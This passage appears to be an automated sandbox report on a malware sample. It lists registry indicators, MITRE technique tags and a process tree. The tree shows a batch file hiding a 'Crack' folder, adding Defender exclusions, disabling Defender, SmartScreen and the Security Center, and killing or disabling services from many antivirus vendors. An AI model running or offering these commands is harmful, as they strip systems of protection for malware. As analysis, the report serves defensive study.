Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={BFF26C8E-FFF8-4822-B5D6-134722349977}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe

Modifies registry class 3 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.MicrosoftEdge.Stable_8wekyb3d8bbwe\WasEverActivated = "1"	sihost.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-308834014-1004923324-1191300197-1000\{F50CF0EC-872C-4B44-B1BC-E54C238A7FA5}	msedge.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

pid	Process
6016	reg.exe

Runs net.exe

Runs ping.exe 1 TTPs 3 IoCs

Remote System Discovery

T1018

pid	Process
3516	PING.EXE
6056	PING.EXE
4864	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

pid	Process
4276	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
536	powershell.exe
536	powershell.exe
4980	powershell.exe
4980	powershell.exe
4884	powershell.exe
4884	powershell.exe
3396	powershell.exe
3396	powershell.exe
3396	powershell.exe
5508	powershell.exe
5508	powershell.exe
5508	powershell.exe
5816	powershell.exe
5816	powershell.exe
5816	powershell.exe
5388	powershell.exe
5388	powershell.exe
5388	powershell.exe
3488	powershell.exe
3488	powershell.exe
3488	powershell.exe
4464	explorerS.exe
4660	powershell.exe
4660	powershell.exe
4660	powershell.exe
4464	explorerS.exe
4464	explorerS.exe
4464	explorerS.exe
4464	explorerS.exe
4464	explorerS.exe
4464	explorerS.exe
4464	explorerS.exe
4464	explorerS.exe
4464	explorerS.exe
4464	explorerS.exe
4464	explorerS.exe
4464	explorerS.exe
3712	dialer.exe
3712	dialer.exe
3712	dialer.exe
3712	dialer.exe
4464	explorerS.exe
4464	explorerS.exe
4464	explorerS.exe
1800	explorer.exe
3452	powershell.exe
3452	powershell.exe
3452	powershell.exe
3712	dialer.exe
3712	dialer.exe
3712	dialer.exe
3712	dialer.exe
3712	dialer.exe
3712	dialer.exe
3452	powershell.exe
3712	dialer.exe
3712	dialer.exe
3712	dialer.exe
3712	dialer.exe
3712	dialer.exe
3712	dialer.exe
3712	dialer.exe
3712	dialer.exe
3712	dialer.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs

pid	Process
4164	msedge.exe
4164	msedge.exe
4164	msedge.exe
4164	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	536	powershell.exe
Token: SeDebugPrivilege	4980	powershell.exe
Token: SeDebugPrivilege	4884	powershell.exe
Token: SeDebugPrivilege	3396	powershell.exe
Token: SeDebugPrivilege	116	taskkill.exe
Token: SeDebugPrivilege	2564	taskkill.exe
Token: SeDebugPrivilege	4804	taskkill.exe
Token: SeDebugPrivilege	2856	taskkill.exe
Token: SeDebugPrivilege	5404	taskkill.exe
Token: SeDebugPrivilege	2460	taskkill.exe
Token: SeDebugPrivilege	6076	taskkill.exe
Token: SeDebugPrivilege	5116	taskkill.exe
Token: SeDebugPrivilege	1468	taskkill.exe
Token: SeDebugPrivilege	2288	taskkill.exe
Token: SeDebugPrivilege	5456	taskkill.exe
Token: SeDebugPrivilege	2176	taskkill.exe
Token: SeDebugPrivilege	5284	taskkill.exe
Token: SeDebugPrivilege	5216	taskkill.exe
Token: SeDebugPrivilege	2784	taskkill.exe
Token: SeDebugPrivilege	3420	taskkill.exe
Token: SeDebugPrivilege	5764	taskkill.exe
Token: SeDebugPrivilege	1020	taskkill.exe
Token: SeDebugPrivilege	4156	taskkill.exe
Token: SeDebugPrivilege	3112	taskkill.exe
Token: SeDebugPrivilege	5096	taskkill.exe
Token: SeDebugPrivilege	2960	taskkill.exe
Token: SeDebugPrivilege	4404	taskkill.exe
Token: SeDebugPrivilege	5956	taskkill.exe
Token: SeDebugPrivilege	5492	taskkill.exe
Token: SeDebugPrivilege	5652	taskkill.exe
Token: SeDebugPrivilege	5488	taskkill.exe
Token: SeDebugPrivilege	2192	taskkill.exe
Token: SeDebugPrivilege	4660	taskkill.exe
Token: SeDebugPrivilege	4656	taskkill.exe
Token: SeDebugPrivilege	3620	taskkill.exe
Token: SeDebugPrivilege	344	taskkill.exe
Token: SeDebugPrivilege	2236	taskkill.exe
Token: SeDebugPrivilege	5768	taskkill.exe
Token: SeDebugPrivilege	4764	taskkill.exe
Token: SeDebugPrivilege	4812	taskkill.exe
Token: SeDebugPrivilege	1500	taskkill.exe
Token: SeDebugPrivilege	3920	taskkill.exe
Token: SeDebugPrivilege	5720	taskkill.exe
Token: SeDebugPrivilege	5664	taskkill.exe
Token: SeDebugPrivilege	5876	taskkill.exe
Token: SeDebugPrivilege	4552	taskkill.exe
Token: SeDebugPrivilege	3300	taskkill.exe
Token: SeDebugPrivilege	2052	taskkill.exe
Token: SeLoadDriverPrivilege	5128	fltMC.exe
Token: SeLoadDriverPrivilege	5196	fltMC.exe
Token: SeLoadDriverPrivilege	320	fltMC.exe
Token: SeLoadDriverPrivilege	2872	fltMC.exe
Token: SeLoadDriverPrivilege	2324	fltMC.exe
Token: SeLoadDriverPrivilege	4500	fltMC.exe
Token: SeDebugPrivilege	5508	powershell.exe
Token: SeDebugPrivilege	5816	powershell.exe
Token: SeDebugPrivilege	5388	powershell.exe
Token: SeDebugPrivilege	3528	explorer.exe
Token: SeDebugPrivilege	3488	powershell.exe
Token: SeDebugPrivilege	5176	Launcher.exe
Token: SeDebugPrivilege	4660	powershell.exe
Token: SeDebugPrivilege	4464	explorerS.exe
Token: SeDebugPrivilege	3712	dialer.exe
Token: SeShutdownPrivilege	2072	powercfg.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
4164	msedge.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
5440	Conhost.exe

Suspicious use of UnmapMainImage 1 IoCs

pid	Process
3432	Explorer.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4592 wrote to memory of 6056	4592	cmd.exe	89
PID 4592 wrote to memory of 6056	4592	cmd.exe	89
PID 4592 wrote to memory of 3016	4592	cmd.exe	90
PID 4592 wrote to memory of 3016	4592	cmd.exe	90
PID 3016 wrote to memory of 1412	3016	net.exe	91
PID 3016 wrote to memory of 1412	3016	net.exe	91
PID 4592 wrote to memory of 3516	4592	cmd.exe	92
PID 4592 wrote to memory of 3516	4592	cmd.exe	92
PID 4592 wrote to memory of 536	4592	cmd.exe	96
PID 4592 wrote to memory of 536	4592	cmd.exe	96
PID 4592 wrote to memory of 4980	4592	cmd.exe	97
PID 4592 wrote to memory of 4980	4592	cmd.exe	97
PID 4592 wrote to memory of 4884	4592	cmd.exe	101
PID 4592 wrote to memory of 4884	4592	cmd.exe	101
PID 4592 wrote to memory of 2136	4592	cmd.exe	103
PID 4592 wrote to memory of 2136	4592	cmd.exe	103
PID 4592 wrote to memory of 3396	4592	cmd.exe	104
PID 4592 wrote to memory of 3396	4592	cmd.exe	104
PID 4592 wrote to memory of 1820	4592	cmd.exe	105
PID 4592 wrote to memory of 1820	4592	cmd.exe	105
PID 4592 wrote to memory of 2932	4592	cmd.exe	106
PID 4592 wrote to memory of 2932	4592	cmd.exe	106
PID 4592 wrote to memory of 3564	4592	cmd.exe	107
PID 4592 wrote to memory of 3564	4592	cmd.exe	107
PID 4592 wrote to memory of 2016	4592	cmd.exe	108
PID 4592 wrote to memory of 2016	4592	cmd.exe	108
PID 4592 wrote to memory of 5988	4592	cmd.exe	109
PID 4592 wrote to memory of 5988	4592	cmd.exe	109
PID 4592 wrote to memory of 4184	4592	cmd.exe	110
PID 4592 wrote to memory of 4184	4592	cmd.exe	110
PID 4592 wrote to memory of 2804	4592	cmd.exe	111
PID 4592 wrote to memory of 2804	4592	cmd.exe	111
PID 4592 wrote to memory of 4164	4592	cmd.exe	112
PID 4592 wrote to memory of 4164	4592	cmd.exe	112
PID 4592 wrote to memory of 3776	4592	cmd.exe	113
PID 4592 wrote to memory of 3776	4592	cmd.exe	113
PID 4592 wrote to memory of 1696	4592	cmd.exe	114
PID 4592 wrote to memory of 1696	4592	cmd.exe	114
PID 4592 wrote to memory of 3772	4592	cmd.exe	115
PID 4592 wrote to memory of 3772	4592	cmd.exe	115
PID 4592 wrote to memory of 1384	4592	cmd.exe	116
PID 4592 wrote to memory of 1384	4592	cmd.exe	116
PID 4592 wrote to memory of 4476	4592	cmd.exe	117
PID 4592 wrote to memory of 4476	4592	cmd.exe	117
PID 4592 wrote to memory of 3936	4592	cmd.exe	118
PID 4592 wrote to memory of 3936	4592	cmd.exe	118
PID 4592 wrote to memory of 2284	4592	cmd.exe	119
PID 4592 wrote to memory of 2284	4592	cmd.exe	119
PID 4592 wrote to memory of 116	4592	cmd.exe	120
PID 4592 wrote to memory of 116	4592	cmd.exe	120
PID 4592 wrote to memory of 2564	4592	cmd.exe	121
PID 4592 wrote to memory of 2564	4592	cmd.exe	121
PID 4592 wrote to memory of 4804	4592	cmd.exe	122
PID 4592 wrote to memory of 4804	4592	cmd.exe	122
PID 4592 wrote to memory of 3044	4592	cmd.exe	123
PID 4592 wrote to memory of 3044	4592	cmd.exe	123
PID 4592 wrote to memory of 3956	4592	cmd.exe	124
PID 4592 wrote to memory of 3956	4592	cmd.exe	124
PID 4592 wrote to memory of 2856	4592	cmd.exe	125
PID 4592 wrote to memory of 2856	4592	cmd.exe	125
PID 4592 wrote to memory of 5404	4592	cmd.exe	126
PID 4592 wrote to memory of 5404	4592	cmd.exe	126
PID 4592 wrote to memory of 2460	4592	cmd.exe	127
PID 4592 wrote to memory of 2460	4592	cmd.exe	127

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

Views/modifies file attributes 1 TTPs 5 IoCs

Hidden Files and Directories

T1564.001

pid	Process
5476	attrib.exe
2136	attrib.exe
2920	attrib.exe
4320	attrib.exe
5796	attrib.exe

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:616
- C:\Windows\system32\dwm.exe
  "dwm.exe"
  2⤵
  PID:316

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:676

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:960

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:612

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:1056

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
- Indicator Removal: Clear Windows Event Logs
PID:1148

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
- Drops file in System32 directory
PID:1156
- C:\Windows\system32\taskhostw.exe
  taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
  2⤵
  PID:2808

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:1164

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1208

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1280

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1288

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1312

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1440

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1492
- C:\Windows\system32\sihost.exe
  sihost.exe
  2⤵
  - Modifies registry class
  PID:2732

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1528

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1540

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
1⤵
PID:1672

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1684

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1736

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
1⤵
PID:1772

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1832

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1884

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
1⤵
PID:1896

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:1964

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:1088

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:1008

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:2116

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
PID:2220

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2268

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2424

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2432

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
1⤵
- Drops file in System32 directory
PID:2580

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
PID:2624

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2660

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2692

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2704

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:2820

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:3000

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
1⤵
PID:3092

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:3328

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious use of UnmapMainImage
PID:3432
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\seven.bat"
  2⤵
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  PID:4592
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:5908
- - C:\Windows\system32\chcp.com
    chcp 65001
    3⤵
    PID:6056
- - C:\Windows\system32\net.exe
    net session
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3016
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 session
      4⤵
      PID:1412
- - C:\Windows\system32\PING.EXE
    ping -n 2 127.0.0.1
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:3516
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -window hidden -command ""
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:536
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Add-MpPreference -ExclusionPath 'C:'"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4980
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Add-MpPreference -ExclusionPath 'C:\ProgramData'"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4884
- - C:\Windows\system32\attrib.exe
    attrib +h "Crack" /s /d
    3⤵
    - Views/modifies file attributes
    PID:2136
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Add-MpPreference -ExclusionPath 'C:\ProgramData\Crack'"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3396
- - C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    - Modifies Windows Defender DisableAntiSpyware settings
    PID:1820
- - C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f
    3⤵
    PID:2932
- - C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v AllowFastServiceStartup /t REG_DWORD /d 0 /f
    3⤵
    PID:3564
- - C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableBehaviorMonitoring /t REG_DWORD /d 1 /f
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    PID:2016
- - C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableOnAccessProtection /t REG_DWORD /d 1 /f
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    PID:5988
- - C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableScanOnRealtimeEnable /t REG_DWORD /d 1 /f
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    PID:4184
- - C:\Windows\system32\sc.exe
    sc stop WinDefend
    3⤵
    - Launches sc.exe
    PID:2804
- - C:\Windows\system32\sc.exe
    sc config WinDefend start= disabled
    3⤵
    - Launches sc.exe
    PID:4164
- - C:\Windows\system32\sc.exe
    sc stop WdNisSvc
    3⤵
    - Launches sc.exe
    PID:3776
- - C:\Windows\system32\sc.exe
    sc config WdNisSvc start= disabled
    3⤵
    - Launches sc.exe
    PID:1696
- - C:\Windows\system32\reg.exe
    reg add "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc" /v Start /t REG_DWORD /d 4 /f
    3⤵
    - Modifies security service
    PID:3772
- - C:\Windows\system32\sc.exe
    sc stop wscsvc
    3⤵
    - Launches sc.exe
    PID:1384
- - C:\Windows\system32\sc.exe
    sc config wscsvc start= disabled
    3⤵
    - Launches sc.exe
    PID:4476
- - C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v SmartScreenEnabled /t REG_SZ /d "Off" /f
    3⤵
    PID:3936
- - C:\Windows\system32\reg.exe
    reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v EnableWebContentEvaluation /t REG_DWORD /d 0 /f
    3⤵
    PID:2284
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM avp.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:116
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM avpui.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2564
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM klnagent.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4804
- - C:\Windows\system32\sc.exe
    sc stop kavsvc
    3⤵
    - Launches sc.exe
    PID:3044
- - C:\Windows\system32\sc.exe
    sc config kavsvc start= disabled
    3⤵
    - Launches sc.exe
    PID:3956
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM 360tray.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2856
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM 360sd.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:5404
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM 360rp.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2460
- - C:\Windows\system32\sc.exe
    sc stop 360BaseSvc
    3⤵
    - Launches sc.exe
    PID:2980
- - C:\Windows\system32\sc.exe
    sc config 360BaseSvc start= disabled
    3⤵
    - Launches sc.exe
    PID:904
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM egui.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:6076
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM ekrn.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:5116
- - C:\Windows\system32\sc.exe
    sc stop ekrn
    3⤵
    - Launches sc.exe
    PID:4320
- - C:\Windows\system32\sc.exe
    sc config ekrn start= disabled
    3⤵
    - Launches sc.exe
    PID:2212
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM Mcshield.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1468
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM McTray.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2288
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM mfevtps.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:5456
- - C:\Windows\system32\sc.exe
    sc stop McAfeeFramework
    3⤵
    - Launches sc.exe
    PID:3216
- - C:\Windows\system32\sc.exe
    sc config McAfeeFramework start= disabled
    3⤵
    - Launches sc.exe
    PID:1176
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM avgnt.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2176
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM avguard.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:5284
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM avshadow.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:5216
- - C:\Windows\system32\sc.exe
    sc stop Avira.ServiceHost
    3⤵
    - Launches sc.exe
    PID:2836
- - C:\Windows\system32\sc.exe
    sc config Avira.ServiceHost start= disabled
    3⤵
    - Launches sc.exe
    PID:3472
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM dwengine.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2784
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM spideragent.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3420
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM drweb32.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:5764
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM drwebsc.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1020
- - C:\Windows\system32\sc.exe
    sc stop DrWebEngine
    3⤵
    - Launches sc.exe
    PID:1340
- - C:\Windows\system32\sc.exe
    sc config DrWebEngine start= disabled
    3⤵
    - Launches sc.exe
    PID:5628
- - C:\Windows\system32\sc.exe
    sc stop DrWebSpIDer
    3⤵
    - Launches sc.exe
    PID:4316
- - C:\Windows\system32\sc.exe
    sc config DrWebSpIDer start= disabled
    3⤵
    - Launches sc.exe
    PID:412
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM bdagent.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4156
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM bdservicehost.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3112
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM bdredline.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:5096
- - C:\Windows\system32\sc.exe
    sc stop BDProtect
    3⤵
    - Launches sc.exe
    PID:1732
- - C:\Windows\system32\sc.exe
    sc config BDProtect start= disabled
    3⤵
    - Launches sc.exe
    PID:1396
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM avastsvc.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2960
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM aswToolsSvc.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4404
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM aswEngSrv.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:5956
- - C:\Windows\system32\sc.exe
    sc stop "avast! Antivirus"
    3⤵
    - Launches sc.exe
    PID:5568
- - C:\Windows\system32\sc.exe
    sc config "avast! Antivirus" start= disabled
    3⤵
    - Launches sc.exe
    PID:5504
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM avgwdsvc.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:5492
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM avgsvc.exe
    3⤵
    - Kills process with taskkill
    PID:6016
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM avgui.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:5652
- - C:\Windows\system32\sc.exe
    sc stop AVGService
    3⤵
    - Launches sc.exe
    PID:5708
- - C:\Windows\system32\sc.exe
    sc config AVGService start= disabled
    3⤵
    - Launches sc.exe
    PID:3660
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM nortonsecurity.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:5488
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM ns.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2192
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM navw32.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4660
- - C:\Windows\system32\sc.exe
    sc stop NortonSecurity
    3⤵
    - Launches sc.exe
    PID:4504
- - C:\Windows\system32\sc.exe
    sc config NortonSecurity start= disabled
    3⤵
    - Launches sc.exe
    PID:6040
- - C:\Windows\system32\taskkill.exe
